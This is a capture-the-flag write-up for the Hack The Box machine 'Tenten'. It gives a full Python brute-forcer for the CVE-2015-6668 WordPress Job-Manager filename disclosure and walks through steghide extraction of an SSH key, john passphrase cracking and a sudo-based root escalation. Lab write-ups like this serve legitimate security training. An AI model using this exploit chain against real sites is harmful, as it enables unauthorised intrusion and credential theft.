Tenten

Let’s get started!:)

Level: Intermediate

Reconnaissance

This is the initial step in order to scan the open services in the machine.

COMMAND: nmap -sC -sV -O -oA tenten 10.10.10.10

Nmap-Scan

From the given above image, you can observe that we found port 22,80 are open in the machine.

Knowing port 80 is open inmachine we preferred to explore IP in the browser

URL: http://10.10.10.10

Above image indicates that its a wordpress site. Let’s enumerate it with wpscan!

COMMAND:

wpscan –url http://10.10.10.10/ –enumerate t –enumerate t –enumerate u

With the help of wpscan we can able to found the user of the site name takis!

Now let’s enumerate the site web pages!

Now i clicked on job listing !

After clicking on apply now the page is opened as below!

As we can see there is an id and we will try to change it and set as 10.

As we can the job title has been changed and try to open the page with id 11.

So as to avoid wastage of time. We have simply captured the request of the page using burpsuite and sent to intruder for fuzzing.

Intercept the request and send it to intruder.

Set the attack type as sniper and set payload as number from 8 to 20.

Now start the attack and check every page .

As you can see the attack has begun. By selecting payload 13 which made us think there might be something different about this page and there we saw the title of the page which is HackerAccessGranted as you can see below.

s we know in WordPress there is directory structure for the uploaded files is recognized by /wp-content/uploads/%year%/%month%/%filename% then I connect HackerAccessGranted with an Image file and at last after so many attempts I execute to use the following URL.

I used [CVE-2015-6668] CV filename disclosure on Job-Manager WP plugin code in order to bruteforce!

import requests

print """  
CVE-2015-6668  
Title: CV filename disclosure on Job-Manager WP Plugin  
Author: Evangelos Mourikis  
Blog: https://vagmour.eu  
Plugin URL: http://www.wp-jobmanager.com  
Versions: <=0.7.25  
"""  
website = raw_input('Enter a vulnerable website: ')  
filename = raw_input('Enter a file name: ')

filename2 = filename.replace(" ", "-")

for year in range(2013,2016):  
    for i in range(1,13):
        for extension in {'doc','pdf','docx'}:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code==200:
                print "[+] URL of CV found! " + URL

I modified the code and run the script on the target machine!

for year in range(2017,2018):  
for i in range(1,13):
for extension in {'php','html','pdf','png','gif','jpg','jpeg'}:

BOOM! we found the actual url of the file!!

Let’s download it and use steghide tool !

COMMAND: steghide extract -sf HackerAccessGranted.jpg

Asking the password ,Let’s enter without any password!

use cat command to display the key!

COMMAND: cat id_rsa

Use ssh2john.py to convert the private key to bruteforce with john tool

After converting ,use john to crack the password using rockyou.txt wordlist!

BOOM! we got the password . Let’s use it to connect via ssh.

We got ssh !!

Let’s pwn the user flag!!

Privilege escalation
Now that we user access we need to elevate our permissions to root. Let’s start with getting system information.

takis@tenten:~$ cat /etc/issue
Ubuntu 16.04.2 LTS \n \l

Escalating to root shows that we have access to a file called “/bin/fuckin.”

We need to find out what in this file.

fuckin seems to be a batch script that contains arguments that we can pass on.

Adding an argument after the file while running it as sudo allows us to run commands as root.

Adding bash to the first argument gives us root shell.

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r

LEAVE A REPLY

Please enter your comment!
Please enter your name here